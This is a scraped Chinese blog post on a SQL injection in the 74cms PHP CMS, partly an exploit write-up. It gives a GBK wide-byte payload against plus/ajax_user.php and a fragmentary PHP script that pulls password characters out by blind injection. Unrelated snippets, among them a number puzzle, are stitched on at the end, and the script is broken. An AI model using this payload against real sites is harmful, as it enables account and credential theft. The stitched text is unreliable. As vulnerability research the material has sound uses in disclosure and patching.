不好好修改漏洞** 而是修改過濾函式 雖然你們這過濾函式我繞不過。
但是過濾的還不是很完善, 還能出資料。
還是在修改過濾函式的同時好好修改下產生漏洞的**把。
看過濾函式
function remove_xss($string)
$pattern .= $parm[$i][$j];
}$pattern .= '/i';
$string = preg_replace($pattern, '****', $string);
}return $string;
}這裡開啟了i模式而且replace成**** 之前是replace空還能繞過 現在我沒辦法了。
那就想辦法繞過這些關鍵字。 可以看到過濾了union select 之類的常用的關鍵字。
wooyun: 74cms 最新版 注入1-3
wooyun: 74cms 最新版 注入4-7
wooyun: 74cms 最新版 注入8-9
這裡 9枚注入 我下了個0709的看 沒一處修改的 就是修改了過濾函式。
9處都是一樣的 這裡我就選一處來說就好了。
在plus/ajax_user.php中
elseif($act == 'check_email')
$user=get_user_inemail($email);
empty($user)?exit("true"):exit("false");
}這裡涉及到了轉碼 之前也說得很清楚了。
錦 從utf-8 轉換到 gbk為%e5%5c
單引號被轉義後成\' \為%5c
兩個%5c%5c又再閉合 單引號出來 所以造成了注入。
在這裡由於過濾了關鍵字 但是還是能繞過。
利用substr來
當為正確的資料的時候會返回false 因為是正確的會查詢出來
這裡是檢測是否重複 查詢出來就說明重複了 就返回了false。
這裡我自己寫了個小指令碼。
- - 我不會php 挺簡單的東西折騰了半天。
<?php
$yu=1;
for($i=0;$i<120;$i++);
$content="email=x%e9%8c%a6' or if(ascii(substr(left(password,$yu),$yu,1))=$i,1,null)%23";
$url = '';//接收xml位址
看這語句 沒含有過濾的關鍵字 所以可以成功。
在繼續完善過濾函式的同時也改改這九處轉換編碼的地方。
在修改過濾函式的同時好好修改下產生漏洞的**把。
74cms漏洞分析
很早以前的乙個洞,看到很有意思就拿來看看 這是雨曾經審過的乙個洞,因為讀取方式很特別復現了一下 首先看到乙個sql語句 idresult this query select id from wheresql.orderbysql.limit 倒回去跟進幾個變數 orderbysql order by...
74CMS 3 0 SQL注入漏洞前台
1.雙擊執行桌面phpstudy.exe軟體 2.點選啟動按鈕,啟動伺服器環境 1.雙擊啟動桌面seay源 審計系統軟體 2.因為74cms3.0源 編輯使用gbk編輯,所以首先需要先將編碼改成gbk 3.點選新建專案按鈕,彈出對畫框中選擇 c phpstudy www 74cms 點選確定 漏洞分...
7 4 整除光棍(20 分)
7 4 整除光棍 20 分 這裡所謂的 光棍 並不是指單身汪啦 說的是全部由1組成的數字,比如1 11 111 1111等。傳說任何乙個光棍都能被乙個不以5結尾的奇數整除。比如,111111就可以被13整除。現在,你的程式要讀入乙個整數x,這個整數一定是奇數並且不以5結尾。然後,經過計算,輸出兩個數...